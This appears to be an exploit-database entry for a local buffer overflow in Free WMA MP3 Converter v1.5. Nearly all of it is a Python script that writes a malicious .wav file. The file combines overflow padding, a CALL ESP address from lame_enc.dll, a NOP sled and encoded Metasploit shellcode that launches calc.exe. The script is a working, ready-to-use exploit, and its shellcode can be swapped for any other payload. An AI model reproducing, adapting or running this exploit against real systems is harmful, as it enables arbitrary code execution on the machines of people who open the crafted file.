Free WMA MP3 Converter v1.5 (.wav) Local Buffer Overflow Vulnerability

2012-01-24T00:00:00
ID 1337DAY-ID-17433
Type zdt
Reporter Julien Ahrens
Modified 2012-01-24T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            #!/usr/bin/python
 
# Exploit Title: Free WMA MP3 Converter v1.5 (.wav) Local Buffer Overflow Vulnerability
# Version:       1.5
# Date:          2012-01-21
# Author:        Julien Ahrens
# Homepage:      www.inshell.net
# Software Link: http://www.eusing.com
# Tested on:     Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German

from struct import pack

file="exploit.wav"

junk="\x41" * 4112 
eip=pack('<I',0x1000F406) # CALL ESP from lame_enc.dll
nops = "\x90" * 4

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\xff\x5c\x2f\x0a\x0d\x20'

shellcode = ("\xbf\xca\x58\x4e\xbd\xdb\xd8\xd9\x74\x24\xf4\x5b\x29\xc9" +
"\xb1\x33\x31\x7b\x12\x83\xeb\xfc\x03\xb1\x56\xac\x48\xb9" +
"\x8f\xb9\xb3\x41\x50\xda\x3a\xa4\x61\xc8\x59\xad\xd0\xdc" +
"\x2a\xe3\xd8\x97\x7f\x17\x6a\xd5\x57\x18\xdb\x50\x8e\x17" +
"\xdc\x54\x0e\xfb\x1e\xf6\xf2\x01\x73\xd8\xcb\xca\x86\x19" +
"\x0b\x36\x68\x4b\xc4\x3d\xdb\x7c\x61\x03\xe0\x7d\xa5\x08" +
"\x58\x06\xc0\xce\x2d\xbc\xcb\x1e\x9d\xcb\x84\x86\x95\x94" +
"\x34\xb7\x7a\xc7\x09\xfe\xf7\x3c\xf9\x01\xde\x0c\x02\x30" +
"\x1e\xc2\x3d\xfd\x93\x1a\x79\x39\x4c\x69\x71\x3a\xf1\x6a" +
"\x42\x41\x2d\xfe\x57\xe1\xa6\x58\xbc\x10\x6a\x3e\x37\x1e" +
"\xc7\x34\x1f\x02\xd6\x99\x2b\x3e\x53\x1c\xfc\xb7\x27\x3b" +
"\xd8\x9c\xfc\x22\x79\x78\x52\x5a\x99\x24\x0b\xfe\xd1\xc6" +
"\x58\x78\xb8\x8c\x9f\x08\xc6\xe9\xa0\x12\xc9\x59\xc9\x23" +
"\x42\x36\x8e\xbb\x81\x73\x60\xf6\x88\xd5\xe9\x5f\x59\x64" +
"\x74\x60\xb7\xaa\x81\xe3\x32\x52\x76\xfb\x36\x57\x32\xbb" +
"\xab\x25\x2b\x2e\xcc\x9a\x4c\x7b\xaf\x7d\xdf\xe7\x1e\x18" +
"\x67\x8d\x5e")

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write(junk + eip + nops + shellcode)
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[*] Error while creating file!";



#  0day.today [2018-04-08]  #